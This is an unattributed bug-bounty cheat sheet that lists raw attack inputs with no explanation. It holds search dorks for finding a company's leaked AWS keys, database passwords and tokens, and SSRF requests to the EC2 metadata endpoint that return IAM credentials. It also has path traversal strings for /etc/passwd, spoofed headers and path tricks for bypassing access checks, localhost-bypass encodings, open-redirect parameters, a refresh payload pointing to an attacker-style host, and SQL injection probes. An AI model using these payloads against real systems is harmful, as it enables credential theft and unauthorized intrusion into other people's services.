


Finding open redirect? use dork to find it
site:http://target.com inurl:%2f
site:http://target.com inurl:%3f
site:http://target.com inurl:%3a
If you found an SSRF vulnerability that runs on EC2, try requesting :
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_USER_ROLE_HERE

xmlrpc.php
file:///etc/passwd
=../../../etc/passwd%00


site:http://target.com inurl:admin intext:files ext:aspx

org:Target "bucket_name"
org:Target "aws_access_key"
org:Target "aws_secret_key"
org:Target "S3_BUCKET"
org:Target "S3_ACCESS_KEY_ID"
org:Target "S3_SECRET_ACCESS_KEY"
org:Target "S3_ENDPOINT"
org:Target  "AWS_ACCESS_KEY_ID"
org:Target  "list_aws_accounts"

X-Rewrite-Url: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Port: 127.0.0.1
X-Forwarded-Scheme: 127.0.0.1
X-Frame-Options: Allow
X-Forwarded-For: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorizition: 127.0.0.1
X-Forwarded-For: 127.0.0.2
X-Originting-IP: 127.0.0.1
X-Remote-IP: 127.0.0.3
X-Remote-Addr: 127.0.0.4
X-Client-IP: 127.0.0.5
X-Host: 127.0.0.6
X-Forwarded-Host: 127.0.0.1

{api_key, api-key, apikey , api , access , AccessToken , gmap , gmaps , algolia_api_key , credentials, etc..}

debug/pprof/FUZZ

0;url=http:&#x2F;&#x2F;www.evilzone.com"HTTP-EQUIV="refresh"any=".arexport



SSRF Bypass list for localhost (127.0.0.1):
http://127.1/
http://0000::1:80/
http://[::]:80/
http://2130706433/
http://whitelisted@127.0.0.1
http://0x7f000001/
http://017700000001
http://0177.00.00.01

If '/something' => 403
Try -
'/something/'
'/something/%20'
'/something.html'
'/something.json
'/something/?anything'
'/something#'

Cookie:usid=../../../../../../../../../../../../../etc/pasdwd

1. select '\f\l\a\g'='flag';  // This is true
2.  All are same
   *  select 'abcd'; 
   *  select 0x61626364; 
   *  select 0b01100001011000100110001101100100;
3. select 'admin' = 'àdmin'; // is true if utf8 is allowed






.*\.google\.com 
.*\.googleapis\.com
.*\.gstatic\.com
.*\.mozilla\.com
.*\.pki\.goog


/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_url={payload}
?redirect={payload}
/cgi-bin/redirect.cgi?{payload}
?out={payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}

site:http://codepad.co "company"
site:http://scribd.com "company"
site:http://npmjs.com "company"
site:http://npm.runkit.com "company"
site:http://libraries.io "company"
site:http://ycombinator.com "company"
site:http://coggle.it "company"
site:http://papaly.com "company"
site:http://google.com "company"
site:http://trello.com "company"
site:http://prezi.com "company"
site:http://jsdelivr.net "company"
site:http://codepen.io "company"
site:http://codeshare.io "company"
site:http://sharecode.io "company"
site:http://pastebin.com "company"
site:http://repl.it "company"
site:http://productforums.google.com "company"
site:http://gitter.im "company"
site:http://bitbucket.org "company"
site:*.atlassian.net "company"
atlassian.net "company"
inurl:gitlab "company"



site:http://repl.it intext:company
site:http://zoom.us inurl:company
site:http://atlassian.net inurl:company
site:http://s3.amazonaws.com inurl:company
site:http://pastebin.com inurl:company
site:http://company.com intitle:Index of
site:http://company.com ext:log
site:http://company.com inurl:redir | inurl:redirect | inurl:return | inurl:to

site:http://company.com ext:doc | ext:docx | ext:odt | ext:pd
site:http://company.com ext:sql
site:http://scribd.com intext:http://internal.company.com

"company name" db_password
"company name" "Authorization: Bearer"
"company name" filename:vim_settings.xml
"company name" language:shell
"company name" language:python
"company name" fb_secret
"company name" sendkeys
"company name" pwd
"company name" mailgun
"company name" mailchimp
"company name" dotfiles
"company name" filename:.dockercfg auth
"company name" apikey




/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||'   <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='

